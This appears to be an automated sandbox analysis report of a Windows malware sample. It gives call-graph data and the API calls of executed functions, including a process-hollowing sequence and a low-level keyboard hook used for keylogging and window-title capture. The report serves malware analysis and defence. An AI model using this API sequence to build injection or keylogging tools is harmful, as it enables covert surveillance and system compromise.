54911->54912 54913 413742 54911->54913 54912->54913 54913->54510 54914->54545 54918 4344ef 54915->54918 54916 43bd51 new 21 API calls 54916->54918 54917 40f0d1 54917->54582 54918->54916 54918->54917 55305 442f80 7 API calls 2 library calls 54918->55305 55306 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 54918->55306 55307 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 54918->55307 54923 402093 28 API calls 54922->54923 54924 40d9ff 54923->54924 54925 41bc5e 28 API calls 54924->54925 54926 40da0a 54925->54926 54927 40da34 32 API calls 54926->54927 54928 40da1b 54927->54928 54929 401f09 11 API calls 54928->54929 54930 40da24 54929->54930 54931 401fd8 11 API calls 54930->54931 54932 40da2c 54931->54932 54932->54616 54933->54601 54935->54645 54936->54450 54939 41b4c5 LoadResource LockResource SizeofResource 54938->54939 54940 40f3de 54938->54940 54939->54940 54940->54691 54942 4020b7 28 API calls 54941->54942 54943 406dec 54942->54943 54943->54702 54944->54706 54947 4135d4 RegQueryValueExA RegCloseKey 54946->54947 54948 4135fe 54946->54948 54947->54948 54949 402093 28 API calls 54948->54949 54950 413613 54949->54950 54950->54715 54951->54726 54953 40a127 54952->54953 54954 413549 3 API calls 54953->54954 54955 40a12e 54954->54955 54956 40a142 54955->54956 54957 40a15c 54955->54957 54958 409e9b 54956->54958 54959 40a147 54956->54959 54973 40905c 54957->54973 54958->54574 54961 40905c 28 API calls 54959->54961 54963 40a155 54961->54963 55001 40a22d 29 API calls 54963->55001 54966 40a15a 54966->54958 54967->54768 55130 403222 54968->55130 54970 403022 54971 403262 11 API calls 54970->54971 54972 403031 54971->54972 54972->54772 54974 409072 54973->54974 54975 402252 11 API calls 54974->54975 54976 40908c 54975->54976 54977 404267 28 API calls 54976->54977 54978 40909a 54977->54978 54979 40a179 54978->54979 55002 40b8ec 54979->55002 54982 40a1a2 54984 402093 28 API calls 54982->54984 54983 40a1ca 54985 402093 28 API calls 54983->54985 54986 40a1ac 54984->54986 54987 40a1d5 54985->54987 54988 41bc5e 28 API calls 54986->54988 54989 402093 28 API calls 54987->54989 54990 40a1ba 54988->54990 54991 40a1e4 54989->54991 55006 40b164 31 API calls new 54990->55006 54992 41b4ef 80 API calls 54991->54992 54994 40a1e9 CreateThread 54992->54994 54996 40a210 CreateThread 54994->54996 54997 40a204 CreateThread 54994->54997 55014 40a27d 54994->55014 54995 40a1c1 54998 401fd8 11 API calls 54995->54998 54999 401f09 11 API calls 54996->54999 55011 40a289 54996->55011 54997->54996 55008 40a267 54997->55008 54998->54983 55000 40a224 54999->55000 55000->54958 55001->54966 55129 40a273 164 API calls 55001->55129 55003 40b8f5 55002->55003 55004 40a197 55002->55004 55007 40b96c 28 API calls 55003->55007 55004->54982 55004->54983 55006->54995 55007->55004 55017 40a2b8 55008->55017 55033 40acd6 55011->55033 55071 40a726 55014->55071 55018 40a2d1 GetModuleHandleA SetWindowsHookExA 55017->55018 55019 40a333 GetMessageA 55017->55019 55018->55019 55021 40a2ed GetLastError 55018->55021 55020 40a345 TranslateMessage DispatchMessageA 55019->55020 55031 40a270 55019->55031 55020->55019 55020->55031 55022 41bb8e 28 API calls 55021->55022 55023 40a2fe 55022->55023 55032 4052fd 28 API calls 55023->55032 55062 40ace4 55033->55062 55034 40a292 55035 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 55037 40b904 28 API calls 55035->55037 55037->55062 55038 401f86 11 API calls 55038->55062 55041 41bae6 GetLastInputInfo GetTickCount 55041->55062 55042 40ad84 GetWindowTextW 55042->55062 55044 401f09 11 API calls 55044->55062 55045 40b8ec 28 API calls 55045->55062 55046 40aedc 55047 401f09 11 API calls 55046->55047 55047->55034 55048 40ae49 Sleep 55048->55062 55049 441e81 20 API calls 55049->55062 55051 402093 28 API calls 55051->55062 55052 40add1 55055 40905c 28 API calls 55052->55055 55052->55062 55067 40b164 31 API calls new 55052->55067 55055->55052 55056 403014 28 API calls 55056->55062 55057 406383 28 API calls 55057->55062 55059 40a636 12 API calls 55059->55062 55060 41bc5e 28 API calls 55060->55062 55061 401fd8 11 API calls 55061->55062 55062->55034 55062->55035 55062->55038 55062->55041 55062->55042 55062->55044 55062->55045 55062->55046 55062->55048 55062->55049 55062->55051 55062->55052 55062->55056 55062->55057 55062->55059 55062->55060 55062->55061 55063 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 55062->55063 55064 434770 23 API calls __onexit 55062->55064 55065 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 55062->55065 55066 409044 28 API calls 55062->55066 55068 40b97c 28 API calls 55062->55068 55069 40b748 40 API calls 2 library calls 55062->55069 55070 4052fd 28 API calls 55062->55070 55064->55062 55065->55062 55066->55062 55067->55052 55068->55062 55069->55062 55072 40a73b Sleep 55071->55072 55092 40a675 55072->55092 55074 40a286 55075 40a78c GetFileAttributesW 55079 40a74d 55075->55079 55076 40a77b CreateDirectoryW 55076->55079 55077 40a7a3 SetFileAttributesW 55077->55079 55079->55072 55079->55074 55079->55075 55079->55077 55081 401e65 22 API calls 55079->55081 55085 40a926 SetFileAttributesW 55079->55085 55089 40a76f 55079->55089 55104 41c3f1 55079->55104 55080 40a81d PathFileExistsW 55080->55089 55081->55079 55082 4020df 11 API calls 55082->55089 55084 4020b7 28 API calls 55084->55089 55085->55079 55086 406dd8 28 API calls 55086->55089 55087 401fe2 28 API calls 55087->55089 55089->55076 55089->55080 55089->55082 55089->55084 55089->55086 55089->55087 55090 401fd8 11 API calls 55089->55090 55091 401fd8 11 API calls 55089->55091 55114 41c485 CreateFileW 55089->55114 55122 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 55089->55122 55090->55089 55091->55079 55093 40a722 55092->55093 55095 40a68b 55092->55095 55093->55079 55094 40a6aa CreateFileW 55094->55095 55096 40a6b8 GetFileSize 55094->55096 55095->55094 55097 40a6ed CloseHandle 55095->55097 55098 40a6ff 55095->55098 55099 40a6e2 Sleep 55095->55099 55123 40b0dc 84 API calls 55095->55123 55096->55095 55096->55097 55097->55095 55098->55093 55101 40905c 28 API calls 55098->55101 55099->55097 55102 40a71b 55101->55102 55103 40a179 125 API calls 55102->55103 55103->55093 55105 41c404 CreateFileW 55104->55105 55107 41c441 55105->55107 55108 41c43d 55105->55108 55109 41c461 WriteFile 55107->55109 55110 41c448 SetFilePointer 55107->55110 55108->55079 55112 41c474 55109->55112 55113 41c476 FindCloseChangeNotification 55109->55113 55110->55109 55111 41c458 CloseHandle 55110->55111 55111->55108 55112->55113 55113->55108 55115 41c4ab 55114->55115 55116 41c4af GetFileSize 55114->55116 55115->55089 55124 40244e 55116->55124 55118 41c4c3 55119 41c4d5 ReadFile 55118->55119 55120 41c4e2 55119->55120 55121 41c4e4 CloseHandle 55119->55121 55120->55121 55121->55115 55122->55089 55123->55099 55125 402456 55124->55125 55127 402460 55125->55127 55128 402a51 28 API calls 55125->55128 55127->55118 55128->55127 55131 40322e 55130->55131 55134 403618 55131->55134 55133 40323b 55133->54970 55135 403626 55134->55135 55136 403644 55135->55136 55137 40362c 55135->55137 55139 40365c 55136->55139 55140 40369e 55136->55140 55138 4036a6 28 API calls 55137->55138 55144 403642 55138->55144 55142 4027e6 28 API calls 55139->55142 55139->55144 55145 4028a4 22 API calls 55140->55145 55142->55144 55144->55133 55151 404353 55146->55151 55148 40430a 55149 403262 11 API calls 55148->55149 55150 404319 55149->55150 55150->54781 55152 40435f 55151->55152 55155 404371 55152->55155 55154 40436d 55154->55148 55156 40437f 55155->55156 55157 404385 55156->55157 55158 40439e 55156->55158 55219 4034e6 28 API calls 55157->55219 55159 402888 22 API calls 55158->55159 55160 4043a6 55159->55160 55162 404419 55160->55162 55163 4043bf 55160->55163 55220 4028a4 22 API calls 55162->55220 55165 4027e6 28 API calls 55163->55165 55174 40439c 55163->55174 55165->55174 55174->55154 55219->55174 55227 43aa9a 55221->55227 55225 41388f RegSetValueExA RegCloseKey 55224->55225 55226 4138b9 55224->55226 55225->55226 55226->54797 55230 43aa1b 55227->55230 55229 40170d 55229->54799 55231 43aa2a 55230->55231 55232 43aa3e 55230->55232 55236 4405dd 20 API calls __dosmaperr 55231->55236 55235 43aa2f __alldvrm __cftof 55232->55235 55237 448957 11 API calls 2 library calls 55232->55237 55235->55229 55236->55235 55237->55235 55239 41b8f9 ctype ___scrt_get_show_window_mode 55238->55239 55240 402093 28 API calls 55239->55240 55241 414f49 55240->55241 55241->54806 55242->54823 55244 414f02 getaddrinfo WSASetLastError 55243->55244 55245 414ef8 55243->55245 55244->54887 55272 414d86 29 API calls ___std_exception_copy 55245->55272 55247 414efd 55247->55244 55273 41b7b6 GlobalMemoryStatusEx 55248->55273 55250 41b7f5 55250->54887 55274 414580 55251->55274 55255 40dda5 55254->55255 55256 4134ff 3 API calls 55255->55256 55258 40ddac 55256->55258 55257 40ddc4 55257->54887 55258->55257 55259 413549 3 API calls 55258->55259 55259->55257 55261 4020b7 28 API calls 55260->55261 55262 41bc57 55261->55262 55262->54887 55263->54887 55265 402093 28 API calls 55264->55265 55266 40f8f6 55265->55266 55266->54887 55267->54887 55268->54852 55270->54852 55271->54852 55272->55247 55273->55250 55277 414553 55274->55277 55278 414568 ___scrt_initialize_default_local_stdio_options 55277->55278 55281 43f79d 55278->55281 55284 43c4f0 55281->55284 55285 43c530 55284->55285 55286 43c518 55284->55286 55285->55286 55287 43c538 55285->55287 55299 4405dd 20 API calls __dosmaperr 55286->55299 55300 43a7b7 36 API calls 3 library calls 55287->55300 55290 43c548 55301 43cc76 20 API calls 2 library calls 55290->55301 55291 43c51d __cftof 55293 434fcb _ValidateLocalCookies 5 API calls 55291->55293 55294 414576 55293->55294 55294->54887 55295 43c5c0 55302 43d2e4 51 API calls 3 library calls 55295->55302 55298 43c5cb 55303 43cce0 20 API calls _free 55298->55303 55299->55291 55300->55290 55301->55295 55302->55298 55303->55291 55305->54918 55309 40f7c2 55308->55309 55310 413549 3 API calls 55309->55310 55311 40f866 55309->55311 55313 40f856 Sleep 55309->55313 55330 40f7f4 55309->55330 55310->55309 55314 40905c 28 API calls 55311->55314 55312 40905c 28 API calls 55312->55330 55313->55309 55317 40f871 55314->55317 55316 41bc5e 28 API calls 55316->55330 55318 41bc5e 28 API calls 55317->55318 55319 40f87d 55318->55319 55343 413814 14 API calls 55319->55343 55322 401f09 11 API calls 55322->55330 55323 40f890 55324 401f09 11 API calls 55323->55324 55325 40f89c 55324->55325 55327 402093 28 API calls 55325->55327 55326 402093 28 API calls 55326->55330 55328 40f8ad 55327->55328 55331 41376f 14 API calls 55328->55331 55329 41376f 14 API calls 55329->55330 55330->55312 55330->55313 55330->55316 55330->55322 55330->55326 55330->55329 55341 40d096 112 API calls ___scrt_get_show_window_mode 55330->55341 55342 413814 14 API calls 55330->55342 55332 40f8c0 55331->55332 55344 412850 TerminateProcess WaitForSingleObject 55332->55344 55334 40f8c8 ExitProcess 55345 4127ee 62 API calls 55340->55345 55342->55330 55343->55323 55344->55334 55346 415d06 55361 41b380 55346->55361 55348 415d0f 55349 4020f6 28 API calls 55348->55349 55350 415d1e 55349->55350 55351 404aa1 61 API calls 55350->55351 55352 415d2a 55351->55352 55353 417089 55352->55353 55354 401fd8 11 API calls 55352->55354 55355 401e8d 11 API calls 55353->55355 55354->55353 55356 417092 55355->55356 55357 401fd8 11 API calls 55356->55357 55358 41709e 55357->55358 55359 401fd8 11 API calls 55358->55359 55360 4170aa 55359->55360 55362 4020df 11 API calls 55361->55362 55363 41b38e 55362->55363 55364 43bd51 new 21 API calls 55363->55364 55365 41b39e InternetOpenW InternetOpenUrlW 55364->55365 55366 41b3c5 InternetReadFile 55365->55366 55370 41b3e8 55366->55370 55367 4020b7 28 API calls 55367->55370 55368 41b415 InternetCloseHandle InternetCloseHandle 55369 41b427 55368->55369 55369->55348 55370->55366 55370->55367 55370->55368 55371 401fd8 11 API calls 55370->55371 55371->55370 55372 1000c7a7 55373 1000c7be 55372->55373 55377 1000c82c 55372->55377 55373->55377 55384 1000c7e6 GetModuleHandleA 55373->55384 55374 1000c835 GetModuleHandleA 55378 1000c83f 55374->55378 55376 1000c872 55377->55374 55377->55376 55377->55378 55378->55377 55379 1000c85f GetProcAddress 55378->55379 55379->55377 55380 1000c7dd 55380->55377 55380->55378 55381 1000c800 GetProcAddress 55380->55381 55381->55377 55382 1000c80d VirtualProtect 55381->55382 55382->55377 55383 1000c81c VirtualProtect 55382->55383 55383->55377 55385 1000c7ef 55384->55385 55386 1000c82c 55384->55386 55396 1000c803 GetProcAddress 55385->55396 55388 1000c872 55386->55388 55389 1000c835 GetModuleHandleA 55386->55389 55395 1000c83f 55386->55395 55389->55395 55390 1000c7f4 55390->55386 55391 1000c800 GetProcAddress 55390->55391 55391->55386 55392 1000c80d VirtualProtect 55391->55392 55392->55386 55393 1000c81c VirtualProtect 55392->55393 55393->55386 55394 1000c85f GetProcAddress 55394->55386 55395->55386 55395->55394 55397 1000c82c 55396->55397 55398 1000c80d VirtualProtect 55396->55398 55400 1000c872 55397->55400 55401 1000c835 GetModuleHandleA 55397->55401 55398->55397 55399 1000c81c VirtualProtect 55398->55399 55399->55397 55403 1000c83f 55401->55403 55402 1000c85f GetProcAddress 55402->55403 55403->55397 55403->55402 55404 44375d 55405 443766 55404->55405 55410 44377f 55404->55410 55406 44376e 55405->55406 55411 4437e5 55405->55411 55408 443776 55408->55406 55422 443ab2 22 API calls 2 library calls 55408->55422 55412 4437f1 55411->55412 55413 4437ee 55411->55413 55423 44f3dd GetEnvironmentStringsW 55412->55423 55413->55408 55416 4437fe 55418 446782 _free 20 API calls 55416->55418 55419 443833 55418->55419 55419->55408 55420 443809 55431 446782 55420->55431 55422->55410 55424 44f3f1 55423->55424 55425 4437f8 55423->55425 55437 446137 55424->55437 55425->55416 55430 44390a 26 API calls 3 library calls 55425->55430 55427 44f405 ctype 55428 446782 _free 20 API calls 55427->55428 55429 44f41f FreeEnvironmentStringsW 55428->55429 55429->55425 55430->55420 55432 44678d RtlFreeHeap 55431->55432 55436 4467b6 _free 55431->55436 55433 4467a2 55432->55433 55432->55436 55446 4405dd 20 API calls __dosmaperr 55433->55446 55435 4467a8 GetLastError 55435->55436 55436->55416 55438 446175 55437->55438 55442 446145 ___crtLCMapStringA 55437->55442 55445 4405dd 20 API calls __dosmaperr 55438->55445 55439 446160 RtlAllocateHeap 55441 446173 55439->55441 55439->55442 55441->55427 55442->55438 55442->55439 55444 442f80 7 API calls 2 library calls 55442->55444 55444->55442 55445->55441 55446->55435 55447 43be58 55448 43be64 _swprintf ___FrameUnwindToState 55447->55448 55449 43be72 55448->55449 55451 43be9c 55448->55451 55463 4405dd 20 API calls __dosmaperr 55449->55463 55458 445888 EnterCriticalSection 55451->55458 55453 43be77 __cftof ___FrameUnwindToState 55454 43bea7 55459 43bf48 55454->55459 55458->55454 55461 43bf56 55459->55461 55460 43beb2 55464 43becf LeaveCriticalSection std::_Lockit::~_Lockit 55460->55464 55461->55460 55465 44976c 37 API calls 2 library calls 55461->55465 55463->55453 55464->55453 55465->55461 55466 448299 GetLastError 55467 4482b2 55466->55467 55468 4482b8 55466->55468 55492 4487bc 11 API calls 2 library calls 55467->55492 55473 44830f SetLastError 55468->55473 55485 445af3 55468->55485 55472 4482d2 55476 446782 _free 17 API calls 55472->55476 55474 448318 55473->55474 55478 4482d8 55476->55478 55477 4482e7 55477->55472 55479 4482ee 55477->55479 55480 448306 SetLastError 55478->55480 55494 448087 20 API calls _abort 55479->55494 55480->55474 55482 4482f9 55483 446782 _free 17 API calls 55482->55483 55484 4482ff 55483->55484 55484->55473 55484->55480 55491 445b00 ___crtLCMapStringA 55485->55491 55486 445b40 55496 4405dd 20 API calls __dosmaperr 55486->55496 55487 445b2b RtlAllocateHeap 55488 445b3e 55487->55488 55487->55491 55488->55472 55493 448812 11 API calls 2 library calls 55488->55493 55491->55486 55491->55487 55495 442f80 7 API calls 2 library calls 55491->55495 55492->55468 55493->55477 55494->55482 55495->55491 55496->55488 55497 40165e 55498 401666 55497->55498 55499 401669 55497->55499 55500 4016a8 55499->55500 55503 401696 55499->55503 55501 4344ea new 22 API calls 55500->55501 55502 40169c 55501->55502 55504 4344ea new 22 API calls 55503->55504 55504->55502

                                                          Executed Functions

                                                          Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                          • API String ID: 4236061018-3687161714
                                                          • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                          • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                          • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                          • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                                          Function 004180EF Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 448 4180ef-418118 449 41811c-418183 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 418480 449->450 451 418189-418190 449->451 452 418482-41848c 450->452 451->450 453 418196-41819d 451->453 453->450 454 4181a3-4181a5 453->454 454->450 455 4181ab-4181d8 call 436e90 * 2 454->455 455->450 460 4181de-4181e9 455->460 460->450 461 4181ef-41821f CreateProcessW 460->461 462 418225-41824d VirtualAlloc Wow64GetThreadContext 461->462 463 41847a GetLastError 461->463 464 418253-418273 ReadProcessMemory 462->464 465 418444-418478 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->465 463->450 464->465 466 418279-41829b NtCreateSection 464->466 465->450 466->465 467 4182a1-4182ae 466->467 468 4182c1-4182e3 NtMapViewOfSection 467->468 469 4182b0-4182bb NtUnmapViewOfSection 467->469 470 4182e5-418322 VirtualFree NtClose TerminateProcess 468->470 471 41832d-418354 GetCurrentProcess NtMapViewOfSection 468->471 469->468 470->449 472 418328 470->472 471->465 473 41835a-41835e 471->473 472->450 474 418360-418364 473->474 475 418367-418385 call 436910 473->475 474->475 478 4183c7-4183d0 475->478 479 418387-418395 475->479 480 4183f0-4183f4 478->480 481 4183d2-4183d8 478->481 482 418397-4183ba call 436910 479->482 485 4183f6-418413 WriteProcessMemory 480->485 486 418419-418430 Wow64SetThreadContext 480->486 481->480 484 4183da-4183ed call 418503 481->484 491 4183bc-4183c3 482->491 484->480 485->465 489 418415 485->489 486->465 490 418432-41843e ResumeThread 486->490 489->486 490->465 493 418440-418442 490->493 491->478 493->452
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004182ED
                                                          • NtClose.NTDLL(?), ref: 004182F7
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                          • ResumeThread.KERNEL32(?), ref: 00418435
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                          • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
                                                          • NtClose.NTDLL(?), ref: 00418468
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                          • GetLastError.KERNEL32 ref: 0041847A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                          • API String ID: 3150337530-3035715614
                                                          • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                          • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                          • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                          • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                          Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1621 40a2b8-40a2cf 1622 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1621->1622 1623 40a333-40a343 GetMessageA 1621->1623 1622->1623 1626 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1622->1626 1624 40a345-40a35d TranslateMessage DispatchMessageA 1623->1624 1625 40a35f 1623->1625 1624->1623 1624->1625 1627 40a361-40a366 1625->1627 1626->1627
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                          • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
